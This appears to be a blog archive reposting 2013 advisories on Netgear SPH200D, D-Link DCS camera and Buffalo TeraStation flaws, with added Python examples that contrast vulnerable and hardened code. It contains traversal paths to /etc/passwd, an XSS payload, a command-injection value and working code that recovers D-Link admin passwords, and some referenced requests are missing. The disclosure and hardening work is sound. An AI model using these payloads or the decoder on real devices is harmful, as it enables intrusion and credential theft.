Archive for 31 January 2013

Netgear SPH200D Multiple Vulnerabilities

Multiple vulnerabilities have been found in the Netgear SPH200D firmware; the discoverer's notes on them are as follows.

Device Name: SPH200D
Vendor: Netgear

============ Vulnerable Firmware Releases: ============

Firmware Version :
Kernel Version : 4.1-18
Web Server Version : 1.5

============ Device Description: ============

============ Shodan Dorks ============

Shodan Search: SPH200D
=> Results 337 devices

============ Vulnerability Overview: ============

* directory traversal: 

Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.
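The directory listing below ("Index of ../../var/") shows what the device's web server does: it appends the request path to its document root without normalising it, so "../" segments walk out of the web root. The following is an added example (not part of the advisory or of Netgear's code) that puts that naive lookup beside a hardened one; the document root "/var/htdocs" is taken from the path the server itself leaks in its 404 message, and the request paths used are constructed for the demonstration.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root; the advisory's 404 message leaks "/var/htdocs/" as the web root.
DOCROOT = "/var/htdocs"


def naive_resolve(url_path: str) -> str:
    """Document root + request path, verbatim: the behaviour the '../../var/' listing implies.

    The kernel resolves the '..' components when the file is opened, so any path on
    the device is reachable.
    """
    return DOCROOT + "/" + unquote(url_path).lstrip("/")


def safe_resolve(url_path: str):
    """Decode once, normalise lexically, and refuse anything outside DOCROOT.

    Returns the resolved filesystem path, or None when the request must be rejected.
    """
    decoded = unquote(url_path)
    if "\x00" in decoded:            # NUL would truncate the path in C string handling
        return None
    candidate = posixpath.normpath(posixpath.join(DOCROOT, decoded.lstrip("/")))
    # normpath has already collapsed '..'; whatever is left must sit under the root.
    if candidate != DOCROOT and not candidate.startswith(DOCROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed requests: the listing's own link form, an encoded variant, and a normal one.
    for req in ("/../../var/", "/%2e%2e/%2e%2e/etc/passwd", "/img/../index.html"):
        print(f"{req:32} naive={naive_resolve(req):40} safe={safe_resolve(req)}")
```

The hardened check is lexical only: on a real server, also resolve symlinks (os.path.realpath) and re-check the result, because a symlink inside the web root can point anywhere, and decode the URL exactly once so that double-encoded sequences are not turned into ".." after the check.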


HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980 7:00:00 GMT
Pragma: no-cache
Server: simple httpd 1.0

demo:x:5000:100:Demo User:/home/demo:/bin/bash

If you request a directory you will get a very nice directory listing for browsing through the filesystem:

HTTP/1.0 200 OK
Content-type: text/html
Expires: Sat, 24 May 1980 7:00:00 GMT
Pragma: no-cache
Server: simple httpd 1.0

<H1>Index of ../../var/</H1>

<p><a href="/../../var/.">.</a></p>
<p><a href="/../../var/..">..</a></p>
<p><a href="/../../var/.Skype">.Skype</a></p>
<p><a href="/../../var/jffs2">jffs2</a></p>
<p><a href="/../../var/htdocs">htdocs</a></p>
<p><a href="/../../var/cnxt">cnxt</a></p>
<p><a href="/../../var/ppp">ppp</a></p>
<p><a href="/../../var/conf">conf</a></p>
<p><a href="/../../var/bin">bin</a></p>
<p><a href="/../../var/usr">usr</a></p>
<p><a href="/../../var/tmp">tmp</a></p>

So with this information you are able to access the skype configuration with the following request:


* Changing the password does not require the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

* local path disclosure: 


The requested URL '/var/htdocs/%3C/' was not found on this server.


* reflected Cross Site Scripting 

Appending scripts to the URL reveals that this is not properly validated for malicious input.
<script>alert(1)</script>e51c012502f


============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Advisory URL:
Twitter: @s3cur1ty_de

============ Time Line: ============

August 2012 - discovered vulnerability
07.08.2012 - reported vulnerability to Netgear
08.08.2012 - case closed by Netgear
29.01.2013 - public release

===================== Advisory end =====================

D-Link DCS Cameras – Multiple Vulnerabilities

The discoverer's description of the D-Link DCS Cameras – Multiple Vulnerabilities is as follows:

Unauthenticated remote access to D-Link DCS cameras

Title:    Unauthenticated remote access to D-Link DCS cameras
Discovery date: 20/06/2012
Release date:   28/01/2013
Credits:        Roberto Paleari (twitter: @rpaleari)

Class:           Authentication bypass, Remote command execution

This security vulnerability affects the following products and firmware versions:
   * D-Link DCS-930L, firmware version 1.04
   * D-Link DCS-932L, firmware version 1.02
Other products and firmware versions are probably also vulnerable, but they
were not checked.

D-Link DCS web cameras allow unauthenticated attackers to obtain the
configuration of the device remotely. A copy of the device configuration can be
obtained by accessing the following URL:

  http://<device IP address>/frame/GetConfig

The obtained configuration file is obfuscated using a trivial obfuscation
scheme. Python code for the deobfuscation follows (sorry, the code is quite a
mess :-)):

# 'data' holds the content of the obfuscated configuration file
# (read it in binary mode; bytes on Python 3 or a Python 2 str both work)
def deobfuscate(data):
    # Stage 1: per-byte add / xor / subtract with fixed constants
    r = []
    for c in data:
        if not isinstance(c, int):
            c = ord(c)
        c = (c + ord('y')) & 0xff
        c = (c ^ ord('Z')) & 0xff
        c = (c - ord('e')) & 0xff
        r.append(c)

    # Stage 2: walk from the last byte to the first; each byte keeps its top
    # five bits (shifted down) and takes the low three bits of its predecessor
    # as its new top bits, the last byte's low bits wrapping round to r[0]
    tmp = None
    i = len(r) - 1
    while i >= 0:
        if i == len(r) - 1:
            x = r[i]
            tmp = ((x & 7) << 5) & 0xff

        if i == 0:
            assert tmp is not None
            x = r[0]
            x = (x >> 3) & 0xff
            x = (x + tmp) & 0xff
            r[0] = x
        else:
            c1 = r[i-1]
            c2 = r[i]
            c1 = c1 & 0x7
            c2 = (c2 >> 3) & 0xff
            c1 = (c1 << 5) & 0xff
            c2 = (c2 + c1) & 0xff
            r[i] = c2
        i = i - 1

    r = "".join([chr(x) for x in r])

    # Stage 3: the plaintext was split into two halves and the halves
    # interleaved; put the pairs back in order (integer division so this
    # also runs on Python 3)
    s = ""
    assert (len(r) % 2) == 0
    half = len(r) // 2
    for i in range(half):
        s += r[i + half] + r[i]
    return s

The above procedure returns the deobfuscated ASCII version of the
configuration file. This file includes, among other things, also the web
password for the "admin" user.
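The decoder above has no key: the three byte constants, the 3-bit rotation and the half-interleaving are all fixed, so anyone can invert it. The following is an added example (not the advisory's code and not D-Link's) that restates the decoder compactly as three separable stages and adds the matching encoder, so the scheme can be exercised end to end. The constants and stages are taken from the advisory's routine; the function names, the sample configuration text, and the observation that stage 2 is a 3-bit rotation of the whole buffer are this example's own.

```python
# Constants from the advisory's decoder; everything else here is fixed too, so no secret is involved.
ADD_KEY, XOR_KEY, SUB_KEY = ord("y"), ord("Z"), ord("e")


def _rotate_right_3(buf: bytes) -> bytes:
    # Stage 2 of the decoder: each byte keeps its top five bits (shifted down) and
    # takes the low three bits of its predecessor as new top bits; buf[-1] for i == 0
    # is the wrap-around from the last byte, exactly what the decoder's 'tmp' does.
    return bytes(((buf[i] >> 3) | ((buf[i - 1] & 7) << 5)) & 0xFF for i in range(len(buf)))


def _rotate_left_3(buf: bytes) -> bytes:
    # Inverse of _rotate_right_3: restore the top five bits and pull the low three
    # bits back from the successor (wrapping from the first byte to the last).
    n = len(buf)
    return bytes((((buf[i] & 0x1F) << 3) | (buf[(i + 1) % n] >> 5)) & 0xFF for i in range(n))


def decode_config(data: bytes) -> str:
    """Same result as the advisory's deobfuscate(), as three explicit stages."""
    # Stage 1: byte-wise add, xor, subtract with fixed constants.
    r = bytes(((((c + ADD_KEY) & 0xFF) ^ XOR_KEY) - SUB_KEY) & 0xFF for c in data)
    # Stage 2: undo the 3-bit rotation across the buffer.
    r = _rotate_right_3(r)
    # Stage 3: the plaintext halves were interleaved; re-pair them.
    if len(r) % 2:
        raise ValueError("obfuscated config must have even length")
    half = len(r) // 2
    out = bytearray()
    for i in range(half):
        out += bytes((r[i + half], r[i]))
    return out.decode("latin-1")


def encode_config(text: str) -> bytes:
    """Inverse of decode_config: run the three stages backwards."""
    plain = text.encode("latin-1")
    if len(plain) % 2:
        raise ValueError("plaintext must have even length")
    half = len(plain) // 2
    r = bytearray(len(plain))
    for i in range(half):
        r[i + half] = plain[2 * i]      # even positions come from the second half
        r[i] = plain[2 * i + 1]         # odd positions come from the first half
    r = _rotate_left_3(bytes(r))
    return bytes(((((c + SUB_KEY) & 0xFF) ^ XOR_KEY) - ADD_KEY) & 0xFF for c in r)


# Constructed sample; a real GetConfig dump is longer, but its layout does not matter here.
SAMPLE_CONFIG = "admin=admin\npassword=s3cret\n"


def roundtrip_ok(text: str = SAMPLE_CONFIG) -> bool:
    blob = encode_config(text)
    return blob != text.encode("latin-1") and decode_config(blob) == text


if __name__ == "__main__":
    print(encode_config(SAMPLE_CONFIG).hex())
    print(decode_config(encode_config(SAMPLE_CONFIG)), end="")
```

Because every stage is keyless and bijective, the "obfuscation" offers no protection once the transform is known; the only thing that protects the admin password is the authentication check that /frame/GetConfig lacks.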

As a side note, it is worth considering that, after exploiting this issue,
authenticated attackers can also leverage the undocumented /docmd.htm web page
to execute arbitrary commands on the affected devices.

This issue has been addressed by D-Link in the following firmware releases:
* DCS-930L V1.06B5 (August 15, 2012)
* DCS-932L V1.04B5 (August 15, 2012)

These updates are available through and have also been implemented
on DCS-942L and higher camera products.

    * 20/06/2012 - Initial vendor contact.

    * 11/07/2012 - The author provided D-Link with the details of the

    * 12/07/2012 - D-Link confirmed the issue is a new security vulnerability.

    * 26/01/2013 - D-Link confirmed the release of firmware versions that
             address the vulnerability.

    * 28/01/2013 - Public disclosure.

The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.

Buffalo TeraStation TS-Series – Multiple Vulnerabilities

The notes on the Buffalo TeraStation TS-Series – Multiple Vulnerabilities are as follows:

Title: Buffalo TeraStation TS-Series multiple vulnerabilities
Version affected: firmware version <= 1.5.7
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi () gmail com
Twitter: @andreaf83
Status: unpatched

Buffalo's TeraStation network attached storage (NAS) solutions offer
centralized storage and backup for home, small office and business

The firmware is based on Linux ARM and most of the internal software
is written using Perl.

The vulnerabilities that I found allow any unauthenticated attacker
to access arbitrary files on the NAS filesystem and execute system
commands with root privileges.

Tested successfully on TS-XL, TS-RXL, TS-WXL, TS-HTGL/R5, TS-XEL with
the latest firmware installed (v1.57). Surely other versions with the
same firmware are vulnerable.

1]======== sync.cgi unauthenticated arbitrary file download ========
Requesting an unprotected cgi, it's possible, for an unauthenticated
user, to download any system file, including /etc/shadow, that contains
the password shadows for the application/system users.


Moreover, using the key "all" it's possible to download the entire
/var/log directory:


2]======== NTP command injection ========
This vulnerability allows authenticated users to execute arbitrary
commands on the system with root privileges.

This is a sample request:
Content-Length: 89
Cookie: webui_session_admin=xxxxxxxxxxxxxxxxxxxxxx_en_0


It's possible to view the command output using the previous
vulnerability (reading the /tmp/output file).
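The NTP finding is the classic shape of command injection in an embedded web UI: a form value is pasted into a shell command line, so a ";" in the value starts a second command that runs as root. The following is an added example (not the advisory's request and not Buffalo's code) that shows the vulnerable construction beside a hardened one. The binary name `ntpdate` and the hostile value are assumptions made for the demonstration; the redirect to /tmp/output mirrors the advisory's note that output can be read back through the file-download bug.

```python
import re

# Hostname or dotted IP only: RFC 1123 labels, no leading hyphen (blocks option
# injection such as "-d"), no whitespace or shell metacharacters at all.
_HOST_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_ntp_command(ntp_server: str) -> str:
    """The injection pattern the advisory describes: the form value is dropped
    straight into a shell line (os.system / Perl backticks style)."""
    return "ntpdate " + ntp_server          # 'ntpdate' is an assumed binary name


def is_safe_ntp_value(ntp_server: str) -> bool:
    return _HOST_RE.match(ntp_server) is not None


def safe_ntp_argv(ntp_server: str) -> list:
    """Hardened form: allow-list the value, then hand it to the binary as a single
    argv element (subprocess.run(argv) with no shell), so nothing is ever parsed
    by /bin/sh."""
    if not is_safe_ntp_value(ntp_server):
        raise ValueError(f"rejected NTP server value: {ntp_server!r}")
    return ["ntpdate", ntp_server]


if __name__ == "__main__":
    # Constructed values: a legitimate server and an injection payload whose output
    # would land in /tmp/output, as in the advisory.
    for value in ("pool.ntp.org", "pool.ntp.org; id > /tmp/output", "-d"):
        print(f"vulnerable: {vulnerable_ntp_command(value)!r}")
        try:
            print(f"hardened:   {safe_ntp_argv(value)!r}")
        except ValueError as err:
            print(f"hardened:   {err}")
```

The allow-list is what does the work; quoting the value for the shell is a weaker fix because it still leaves the command line to be re-parsed and still admits option injection through a value beginning with "-".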